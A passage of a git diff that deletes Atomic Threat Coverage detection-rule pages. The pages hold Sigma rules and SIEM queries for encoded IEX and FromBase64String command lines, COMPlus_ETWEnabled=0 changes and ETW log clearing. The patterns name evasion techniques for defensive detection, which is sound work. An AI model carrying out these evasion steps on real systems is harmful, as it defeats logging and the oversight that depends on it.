-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*OjpGcm9tQmFzZTY0U3RyaW5n* OR *o6RnJvbUJhc2U2NFN0cmluZ* OR *6OkZyb21CYXNlNjRTdHJpbm*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Encoded FromBase64String'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*OjpGcm9tQmFzZTY0U3RyaW5n* *o6RnJvbUJhc2U2NFN0cmluZ* *6OkZyb21CYXNlNjRTdHJpbm*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*OjpGcm9tQmFzZTY0U3RyaW5n*" OR CommandLine="*o6RnJvbUJhc2U2NFN0cmluZ*" OR CommandLine="*6OkZyb21CYXNlNjRTdHJpbm*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*OjpGcm9tQmFzZTY0U3RyaW5n*", "*o6RnJvbUJhc2U2NFN0cmluZ*", "*6OkZyb21CYXNlNjRTdHJpbm*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*OjpGcm9tQmFzZTY0U3RyaW5n.*|.*.*o6RnJvbUJhc2U2NFN0cmluZ.*|.*.*6OkZyb21CYXNlNjRTdHJpbm.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_encoded_iex.md b/Atomic_Threat_Coverage/Detection_Rules/win_encoded_iex.md
deleted file mode 100644
index dcb8113..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_encoded_iex.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Encoded IEX       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a base64 encoded IEX command string in a process command line |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1140: Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1140: Deobfuscate/Decode Files or Information](../Triggers/T1140.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Encoded IEX
-id: 88f680b8-070e-402c-ae11-d2914f2257f1
-status: experimental
-description: Detects a base64 encoded IEX command string in a process command line
-author: Florian Roth
-date: 2019/08/23
-tags:
-    - attack.t1086
-    - attack.t1140
-    - attack.execution
-    - attack.t1059.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|base64offset|contains:
-            - 'IEX (['
-            - 'iex (['
-            - 'iex (New'
-            - 'IEX (New'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*SUVYIChb.*" -or $_.message -match "CommandLine.*.*lFWCAoW.*" -or $_.message -match "CommandLine.*.*JRVggKF.*" -or $_.message -match "CommandLine.*.*aWV4IChb.*" -or $_.message -match "CommandLine.*.*lleCAoW.*" -or $_.message -match "CommandLine.*.*pZXggKF.*" -or $_.message -match "CommandLine.*.*aWV4IChOZX.*" -or $_.message -match "CommandLine.*.*lleCAoTmV3.*" -or $_.message -match "CommandLine.*.*pZXggKE5ld.*" -or $_.message -match "CommandLine.*.*SUVYIChOZX.*" -or $_.message -match "CommandLine.*.*lFWCAoTmV3.*" -or $_.message -match "CommandLine.*.*JRVggKE5ld.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*SUVYIChb* OR *lFWCAoW* OR *JRVggKF* OR *aWV4IChb* OR *lleCAoW* OR *pZXggKF* OR *aWV4IChOZX* OR *lleCAoTmV3* OR *pZXggKE5ld* OR *SUVYIChOZX* OR *lFWCAoTmV3* OR *JRVggKE5ld*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/88f680b8-070e-402c-ae11-d2914f2257f1 <<EOF
-{
-  "metadata": {
-    "title": "Encoded IEX",
-    "description": "Detects a base64 encoded IEX command string in a process command line",
-    "tags": [
-      "attack.t1086",
-      "attack.t1140",
-      "attack.execution",
-      "attack.t1059.003"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*SUVYIChb* OR *lFWCAoW* OR *JRVggKF* OR *aWV4IChb* OR *lleCAoW* OR *pZXggKF* OR *aWV4IChOZX* OR *lleCAoTmV3* OR *pZXggKE5ld* OR *SUVYIChOZX* OR *lFWCAoTmV3* OR *JRVggKE5ld*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*SUVYIChb* OR *lFWCAoW* OR *JRVggKF* OR *aWV4IChb* OR *lleCAoW* OR *pZXggKF* OR *aWV4IChOZX* OR *lleCAoTmV3* OR *pZXggKE5ld* OR *SUVYIChOZX* OR *lFWCAoTmV3* OR *JRVggKE5ld*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Encoded IEX'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*SUVYIChb* *lFWCAoW* *JRVggKF* *aWV4IChb* *lleCAoW* *pZXggKF* *aWV4IChOZX* *lleCAoTmV3* *pZXggKE5ld* *SUVYIChOZX* *lFWCAoTmV3* *JRVggKE5ld*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*SUVYIChb*" OR CommandLine="*lFWCAoW*" OR CommandLine="*JRVggKF*" OR CommandLine="*aWV4IChb*" OR CommandLine="*lleCAoW*" OR CommandLine="*pZXggKF*" OR CommandLine="*aWV4IChOZX*" OR CommandLine="*lleCAoTmV3*" OR CommandLine="*pZXggKE5ld*" OR CommandLine="*SUVYIChOZX*" OR CommandLine="*lFWCAoTmV3*" OR CommandLine="*JRVggKE5ld*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*SUVYIChb*", "*lFWCAoW*", "*JRVggKF*", "*aWV4IChb*", "*lleCAoW*", "*pZXggKF*", "*aWV4IChOZX*", "*lleCAoTmV3*", "*pZXggKE5ld*", "*SUVYIChOZX*", "*lFWCAoTmV3*", "*JRVggKE5ld*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*SUVYIChb.*|.*.*lFWCAoW.*|.*.*JRVggKF.*|.*.*aWV4IChb.*|.*.*lleCAoW.*|.*.*pZXggKF.*|.*.*aWV4IChOZX.*|.*.*lleCAoTmV3.*|.*.*pZXggKE5ld.*|.*.*SUVYIChOZX.*|.*.*lFWCAoTmV3.*|.*.*JRVggKE5ld.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_etw_modification.md b/Atomic_Threat_Coverage/Detection_Rules/win_etw_modification.md
deleted file mode 100644
index a8f33e9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_etw_modification.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | COMPlus_ETWEnabled Registry Modification       |
-|:-------------------------|:------------------|
-| **Description**          | Potential adversaries stopping ETW providers recording loaded .NET assemblies. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/_xpn_/status/1268712093928378368](https://twitter.com/_xpn_/status/1268712093928378368)</li><li>[https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr](https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr)</li><li>[https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables](https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables)</li><li>[https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38](https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38)</li><li>[https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39](https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39)</li><li>[https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_](https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_)</li><li>[https://bunnyinside.com/?term=f71e8cb9c76a](https://bunnyinside.com/?term=f71e8cb9c76a)</li><li>[http://managed670.rssing.com/chan-5590147/all_p1.html](http://managed670.rssing.com/chan-5590147/all_p1.html)</li><li>[https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code](https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code)</li></ul>  |
-| **Author**               | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: COMPlus_ETWEnabled Registry Modification
-id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
-status: experimental
-description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
-references:
-  - https://twitter.com/_xpn_/status/1268712093928378368
-  - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
-  - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
-  - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
-  - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
-  - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
-  - https://bunnyinside.com/?term=f71e8cb9c76a
-  - http://managed670.rssing.com/chan-5590147/all_p1.html
-  - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
-author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-date: 2020/06/05
-tags:
-    - attack.defense_evasion
-    - attack.t1112
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4657
-        ObjectName|endswith: '\SOFTWARE\Microsoft\.NETFramework' 
-        ObjectValueName: 'ETWEnabled'
-        NewValue: '0'
-    condition: selection
-falsepositives:
-    - unknown
-level: critical
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4657" -and $_.message -match "ObjectName.*.*\\SOFTWARE\\Microsoft\\.NETFramework" -and $_.message -match "ObjectValueName.*ETWEnabled" -and $_.message -match "NewValue.*0") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4657" AND winlog.event_data.ObjectName.keyword:*\\SOFTWARE\\Microsoft\\.NETFramework AND winlog.event_data.ObjectValueName:"ETWEnabled" AND NewValue:"0")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a4c90ea1-2634-4ca0-adbb-35eae169b6fc <<EOF
-{
-  "metadata": {
-    "title": "COMPlus_ETWEnabled Registry Modification",
-    "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1112"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4657\" AND winlog.event_data.ObjectName.keyword:*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework AND winlog.event_data.ObjectValueName:\"ETWEnabled\" AND NewValue:\"0\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4657\" AND winlog.event_data.ObjectName.keyword:*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework AND winlog.event_data.ObjectValueName:\"ETWEnabled\" AND NewValue:\"0\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'COMPlus_ETWEnabled Registry Modification'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4657" AND ObjectName.keyword:*\\SOFTWARE\\Microsoft\\.NETFramework AND ObjectValueName:"ETWEnabled" AND NewValue:"0")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4657" ObjectName="*\\SOFTWARE\\Microsoft\\.NETFramework" ObjectValueName="ETWEnabled" NewValue="0")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4657" ObjectName="*\\SOFTWARE\\Microsoft\\.NETFramework" ObjectValueName="ETWEnabled" NewValue="0")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4657)(?=.*.*\SOFTWARE\Microsoft\\.NETFramework)(?=.*ETWEnabled)(?=.*0))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_etw_modification_cmdline.md b/Atomic_Threat_Coverage/Detection_Rules/win_etw_modification_cmdline.md
deleted file mode 100644
index d15c514..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_etw_modification_cmdline.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | COMPlus_ETWEnabled Command Line Arguments       |
-|:-------------------------|:------------------|
-| **Description**          | Potential adversaries stopping ETW providers recording loaded .NET assemblies. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/_xpn_/status/1268712093928378368](https://twitter.com/_xpn_/status/1268712093928378368)</li><li>[https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr](https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr)</li><li>[https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables](https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables)</li><li>[https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38](https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38)</li><li>[https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39](https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39)</li><li>[https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_](https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_)</li><li>[https://bunnyinside.com/?term=f71e8cb9c76a](https://bunnyinside.com/?term=f71e8cb9c76a)</li><li>[http://managed670.rssing.com/chan-5590147/all_p1.html](http://managed670.rssing.com/chan-5590147/all_p1.html)</li><li>[https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code](https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code)</li></ul>  |
-| **Author**               | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: COMPlus_ETWEnabled Command Line Arguments
-id: 41421f44-58f9-455d-838a-c398859841d4
-status: experimental
-description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
-references:
-  - https://twitter.com/_xpn_/status/1268712093928378368
-  - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
-  - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
-  - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
-  - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
-  - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
-  - https://bunnyinside.com/?term=f71e8cb9c76a
-  - http://managed670.rssing.com/chan-5590147/all_p1.html
-  - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
-author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-date: 2020/05/02
-tags:
-    - attack.defense_evasion
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains: 'COMPlus_ETWEnabled=0'
-    condition: selection
-falsepositives:
-    - unknown
-level: critical
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*COMPlus_ETWEnabled=0.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*COMPlus_ETWEnabled\=0*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/41421f44-58f9-455d-838a-c398859841d4 <<EOF
-{
-  "metadata": {
-    "title": "COMPlus_ETWEnabled Command Line Arguments",
-    "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.",
-    "tags": [
-      "attack.defense_evasion"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*COMPlus_ETWEnabled\\=0*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*COMPlus_ETWEnabled\\=0*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'COMPlus_ETWEnabled Command Line Arguments'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*COMPlus_ETWEnabled=0*
-```
-
-
-### splunk
-    
-```
-CommandLine="*COMPlus_ETWEnabled=0*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*COMPlus_ETWEnabled=0*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*COMPlus_ETWEnabled=0.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_etw_trace_evasion.md b/Atomic_Threat_Coverage/Detection_Rules/win_etw_trace_evasion.md
deleted file mode 100644
index 62f32d9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_etw_trace_evasion.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Disable of ETW Trace       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil)</li><li>[https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml)</li><li>[https://abuse.io/lockergoga.txt](https://abuse.io/lockergoga.txt)</li></ul>  |
-| **Author**               | @neu5ron, Florian Roth |
-| Other Tags           | <ul><li>car.2016-04-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Disable of ETW Trace
-id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
-description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
-status: experimental
-references:
-    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
-    - https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml
-    - https://abuse.io/lockergoga.txt
-author: '@neu5ron, Florian Roth'
-date: 2019/03/22
-tags:
-    - attack.execution
-    - attack.t1070
-    - car.2016-04-002
-    - attack.t1551
-level: high
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_clear_1:
-        CommandLine: '* cl */Trace*'
-    selection_clear_2:
-        CommandLine: '* clear-log */Trace*'
-    selection_disable_1:
-        CommandLine: '* sl* /e:false*'
-    selection_disable_2:
-        CommandLine: '* set-log* /e:false*'
-    condition: selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "CommandLine.*.* cl .*/Trace.*" -or $_.message -match "CommandLine.*.* clear-log .*/Trace.*" -or $_.message -match "CommandLine.*.* sl.* /e:false.*" -or $_.message -match "CommandLine.*.* set-log.* /e:false.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*\ cl\ *\/Trace* OR winlog.event_data.CommandLine.keyword:*\ clear\-log\ *\/Trace* OR winlog.event_data.CommandLine.keyword:*\ sl*\ \/e\:false* OR winlog.event_data.CommandLine.keyword:*\ set\-log*\ \/e\:false*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a238b5d0-ce2d-4414-a676-7a531b3d13d6 <<EOF
-{
-  "metadata": {
-    "title": "Disable of ETW Trace",
-    "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.",
-    "tags": [
-      "attack.execution",
-      "attack.t1070",
-      "car.2016-04-002",
-      "attack.t1551"
-    ],
